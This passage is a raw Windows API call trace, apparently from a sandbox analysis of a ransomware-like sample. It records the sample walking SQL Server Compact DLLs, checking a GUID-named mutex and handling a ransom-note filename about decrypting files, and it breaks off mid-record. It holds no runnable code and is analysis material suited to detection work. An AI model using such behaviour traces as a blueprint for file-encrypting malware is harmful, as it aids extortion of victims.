Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll", cchWideChar=77, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcecompact35.dll", lpUsedDefaultChar=0x0) returned 77 [0104.084] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlcecompact35.dll", lpUsedDefaultChar=0x0) returned 4 [0104.084] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0104.084] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.084] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.084] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.084] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.084] GlobalUnlock (hMem=0x45000c) returned 0 [0104.084] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.084] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.084] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.085] GlobalUnlock (hMem=0x45000c) returned 0 [0104.085] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.085] GlobalUnlock (hMem=0x450004) returned 0 [0104.085] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.085] CharLowerBuffW (in: lpsz="sqlceer35EN.dll", cchLength=0xf | out: lpsz="sqlceer35en.dll") returned 0xf [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dll", cchWideChar=74, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceer35EN.dllô", lpUsedDefaultChar=0x0) returned 74 [0104.086] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceer35EN.dllô", lpUsedDefaultChar=0x0) returned 4 [0104.086] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0104.086] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.086] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.086] GlobalLock (hMem=0x450004) returned 0x588000 [0104.086] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.086] GlobalUnlock (hMem=0x450004) returned 0 [0104.086] GlobalLock (hMem=0x450004) returned 0x588000 [0104.087] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.087] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.087] GlobalUnlock (hMem=0x450004) returned 0 [0104.087] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.087] GlobalUnlock (hMem=0x45000c) returned 0 [0104.087] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.087] CharLowerBuffW (in: lpsz="sqlceme35.dll", cchLength=0xd | out: lpsz="sqlceme35.dll") returned 0xd [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceme35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceme35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.088] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceme35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.088] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0104.088] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.088] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.104] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.104] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.104] GlobalUnlock (hMem=0x45000c) returned 0 [0104.104] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.104] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.104] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.104] GlobalUnlock (hMem=0x45000c) returned 0 [0104.104] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.106] GlobalUnlock (hMem=0x450004) returned 0 [0104.106] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.107] CharLowerBuffW (in: lpsz="sqlceoledb35.dll", cchLength=0x10 | out: lpsz="sqlceoledb35.dll") returned 0x10 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceoledb35.dll", cchWideChar=75, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceoledb35.dll", lpUsedDefaultChar=0x0) returned 75 [0104.108] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceoledb35.dll", lpUsedDefaultChar=0x0) returned 4 [0104.108] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0104.108] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.108] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.108] GlobalLock (hMem=0x450004) returned 0x588000 [0104.108] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.108] GlobalUnlock (hMem=0x450004) returned 0 [0104.108] GlobalLock (hMem=0x450004) returned 0x588000 [0104.108] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.108] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.108] GlobalUnlock (hMem=0x450004) returned 0 [0104.108] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.108] GlobalUnlock (hMem=0x45000c) returned 0 [0104.108] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.109] CharLowerBuffW (in: lpsz="sqlceqp35.dll", cchLength=0xd | out: lpsz="sqlceqp35.dll") returned 0xd [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] WideCharToMultiByte 